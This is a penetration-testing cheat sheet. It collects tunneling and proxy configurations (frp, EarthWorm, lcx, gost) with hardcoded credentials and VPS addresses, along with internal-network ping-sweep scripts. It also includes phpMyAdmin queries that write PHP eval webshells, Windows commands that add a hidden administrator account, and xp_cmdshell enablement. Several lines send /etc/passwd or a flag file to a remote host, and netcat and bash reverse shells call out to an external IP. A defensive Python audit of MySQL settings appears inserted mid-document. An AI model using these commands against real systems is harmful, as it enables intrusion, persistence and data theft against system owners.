Pentest notes

I. Tools

0. Tool download links

frp: https://diannaobos.com/frp/
Proxifier: https://proxifier.soft32.com/
EarthWorm (no longer updated; download the binaries from the commit history): https://github.com/rootkiter/Binary-files
Behinder (冰蝎): https://github.com/rebeyond/Behinder/releases
reGeorg: https://github.com/sensepost/reGeorg
lcx: https://github.com/UndefinedIdentifier/LCX
gost: https://github.com/ginuerzh/gost

1. frp without a domain name; requires a VPS; web port forwarding; tested: works

frpc.ini (on the pivot host)

[common]
server_addr = 192.168.8.98
server_port = 7000

[tcp_port]
type = tcp
local_ip = 192.168.59.132
local_port = 80
remote_port = 8080

frps.ini (on the public server)

[common]
bind_port=7000

2. frp with a domain name; requires a VPS; web port forwarding; tested: works

frpc.ini (on the pivot host)

[common]
server_addr = 192.168.8.98
server_port = 7000

[web]
type = http
local_ip = 192.168.59.132
local_port = 80
custom_domains = myselfsite.com

frps.ini (on the public server)

[common]
bind_port=7000
vhost_http_port=80

3. frp + Proxifier; requires a VPS; SOCKS proxy; tested: works

frpc.ini (on the pivot host)

[common]
server_addr = 192.168.8.98
server_port = 7000

[socks_proxy]
type = tcp
remote_port = 9999
plugin = socks5

frps.ini (on the public server)

[common]
bind_port=7000

4. EarthWorm (ew) + Proxifier; requires a VPS; SOCKS proxy; tested: works

Public server:

ew_win32.exe -s rcsocks -l 9999 -e 8888

Pivot host:

ew_win32.exe -s rssocks -d 192.168.8.98 -e 8888

5. reGeorg + Proxifier; no VPS needed; tested: failed

Local machine:

reGeorgSocksProxy.py -p 9999 -u http://{{pivot-ip}}/tunnel.nosocket.php

Pivot host:

Just upload tunnel.nosocket.php.

6. Behinder + Proxifier; no VPS needed; tested: failed

Upload the Behinder shell, enable its SOCKS forwarding, and point Proxifier at the local proxy on port 10086.

7. lcx port forwarding (Win10); requires a VPS; tested: works

192.168.59.133:81 is the internal service.

Pivot host:

Lcx.exe -slave 192.168.8.98 8888 192.168.59.133 81

Public server:

Lcx.exe -listen 8888 9999

Then connect to port 9999 on the public server.

8. gost

gost1

./gost-darwin-amd64-2.11.1 -L rtcp://:8888/localhost:8888 -F forward+ssh://admin:123456@vpsip:2222?ping=60

VPS

./gost-linux-amd64-2.11.1 -L forward+ssh://admin:123456@:2222

SOCKS5 proxying:

gost2

VICTIM

./gost2.11.2 -L=socks5://:7777
./gost2.11.2 -L rtcp://0.0.0.0:8888/localhost:7777 -F forward+ssh://admin:123456@121.40.49.4:9898?ping=60

VPS

./gost2.11.2 -L forward+ssh://admin:123456@:9898

The SOCKS5 proxy is then reachable at vps:8888.

gost3

victim

./gost2.11.2 -L=socks5://:7777
./gost2.11.2 -L rtcp://0.0.0.0:8888/localhost:7777 -F forward+ssh://admin:123456@81.71.76.112:9898?ping=60

VPS:
./gost2.11.2 -L forward+ssh://admin:123456@:9898

gost port forwarding

TCP forwarding:

gost -L=tcp://:LOCAL_PORT/REMOTE_IP:REMOTE_PORT

UDP forwarding:

gost -L=udp://:LOCAL_PORT/REMOTE_IP:REMOTE_PORT

Forwarding both protocols (TCP + UDP):

gost -L=:LOCAL_PORT/REMOTE_IP:REMOTE_PORT

II. Commands

PS:

Ping sweep to find live hosts on the internal network (Windows cmd):

for /l %i in (1,1,255) do ping -n 1 -w 60 192.168.1.%i | find "TTL"

Linux internal network

Bash script:

#!/bin/bash

#########################################
# Usage:                                #
#   <this script> *.*.*.1-255           #
# Example:                              #
#   ping.sh 192.168.100.2-100           #
#                                       #
# Files:                                #
#   pings.sh   child script that pings  #
#   chip.txt   live hosts               #
#   bchip.txt  unreachable hosts        #
#########################################
echo '#!/bin/bash
ping -c 1 $1 1>/dev/null 2>/dev/null
if [ $? -eq 0 ];then
echo "--------------------- 主机存活: $1" >> chip.txt
else
echo "$1 不存在!" >> bchip.txt
fi
' > pings.sh

## Make pings.sh executable and remove old result files so the script can be rerun
## chip.txt  - live IPs
## bchip.txt - unreachable IPs
chmod u+x pings.sh
rm -f chip.txt bchip.txt >/dev/null 2>&1

# Start of the range: last octet before the "-"
a=`echo $1 | awk -F "." '{print $4}' | awk -F "-" '{print $1}'`
# End of the range: last octet after the "-"
b=`echo $1 | awk -F "." '{print $4}' | awk -F "-" '{print $2}'`
echo " "

# Convert the strings to integers
a1=$((a))
b1=$((b))

# Fork one child per host so many hosts are pinged in parallel
for ((i=a1;i<=b1;i++))
do
w=`echo $1 | awk -v name=$i -F "." '{print $1 "." $2 "." $3 "." name}'`
./pings.sh $w &
done

Run:
for i in $(seq 1 255); do bash scan.sh 10.10.$i.0-255;sleep 1;cat chip.txt;done

Alternative script:

#!/bin/bash
NET=$1
for I in {1..254}; do
    if ping -c 1 -W 1 $NET.$I &>/dev/null; then
        echo -e "\033[32m $NET.$I\033[0m is up"
    else
        echo -e "\033[31m $NET.$I\033[0m is down"
    fi
done

Run:

bash 123.sh 10.10.1
nohup bash bash.sh 10.10.13 > 10.10.13.txt &
for i in $(seq 150 175);do bash bash.sh 10.10.$i > 10.10.$i.txt ;done &

phpMyAdmin

-- Method 1: redirect the general query log to a file under the web root
SHOW VARIABLES LIKE '%general%';
set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/1.php';
select "<?php eval($_POST[cmd]);?>";

-- Method 2: write the file directly (only works if secure_file_priv allows that path)
show variables like '%secure_file_priv%';
select '<?php eval($_POST["pwd"]);?>' into outfile 'C:/phpStudy/WWW/1.php';
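As an added defensive check that is not part of the original notes, the following Python audits the three MySQL variables the queries above depend on (general_log, general_log_file, secure_file_priv). The web-root list and the sample rows are constructed; only the C:/phpStudy/WWW path comes from the page.

```python
# Added audit of the MySQL settings the queries above depend on (not from
# the original notes). Input: SHOW VARIABLES rows as a name -> value dict.

# Web roots treated as sensitive; C:/phpStudy/WWW is from the notes, the
# other two are assumed common defaults.
WEB_ROOTS = ("C:/phpStudy/WWW", "/var/www", "C:/inetpub/wwwroot")

def _norm(path):
    """Normalise slashes and case so Windows and Unix paths compare alike."""
    return path.replace("\\", "/").rstrip("/").lower()

def under_web_root(path, web_roots=WEB_ROOTS):
    """True if path is a file or directory inside one of the web roots."""
    p = _norm(path)
    return any(p == _norm(r) or p.startswith(_norm(r) + "/") for r in web_roots)

def audit_mysql_variables(variables):
    """Return finding strings; an empty list means nothing to flag.

    secure_file_priv is NULL (file I/O disabled) when the driver returns
    None or phpMyAdmin shows the literal string 'NULL'.
    """
    v = {k.lower(): val for k, val in variables.items()}
    findings = []
    if str(v.get("general_log", "OFF")).upper() == "ON":
        log_file = str(v.get("general_log_file", ""))
        if under_web_root(log_file):
            findings.append("general_log is ON and writes into a web root: " + log_file)
        else:
            findings.append("general_log is ON; every statement is logged to " + log_file)
    sfp = v.get("secure_file_priv")
    if sfp is None or str(sfp).upper() == "NULL":
        pass  # file import/export disabled: INTO OUTFILE cannot write files
    elif str(sfp) == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE may write anywhere mysqld can")
    elif under_web_root(str(sfp)):
        findings.append("secure_file_priv points into a web root: " + str(sfp))
    return findings

# Constructed sample rows, not taken from a real server.
SAMPLE_HARDENED = {"general_log": "OFF", "general_log_file": "/var/lib/mysql/host.log",
                   "secure_file_priv": "NULL"}
SAMPLE_WEAK = {"general_log": "ON", "general_log_file": "C:/phpStudy/WWW/1.php",
               "secure_file_priv": ""}

if __name__ == "__main__":
    for name, rows in (("hardened", SAMPLE_HARDENED), ("weak", SAMPLE_WEAK)):
        print(name, audit_mysql_variables(rows) or ["no findings"])
```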

Add a user (Windows)

net user test test /add
net localgroup administrators test /add
net localgroup users test /del
net user test 123456

The last command sets the password of user test to 123456; the old password is not required.

SQL Server command execution (xp_cmdshell)

-- xp_cmdshell is disabled by default and must be enabled first
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

EXEC master..xp_cmdshell 'whoami';

Docker

Start all containers:

docker start $(docker ps -a | awk '{ print $1}' | tail -n +2)

Stop all containers:

docker stop $(docker ps -a | awk '{ print $1}' | tail -n +2)

Read a file (send its contents to a remote host)

wget --post-file=/etc/passwd xxxx
curl -F file=@/etc/passwd xxxx
bash -c 'cat /flag > /dev/tcp/ip/port'

SUID privilege escalation (list SUID binaries)

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Compress

find ./ -type f -name '*.php' -print0 | tar -zcvf /tmp/t.tar.gz --null -T -

Piping into tar with -T - keeps every file in a single archive; with xargs a long list may be split into several tar runs that overwrite each other.

Reverse shell

netcat 47.xxx.xxx.72 2333 -e /bin/bash
bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1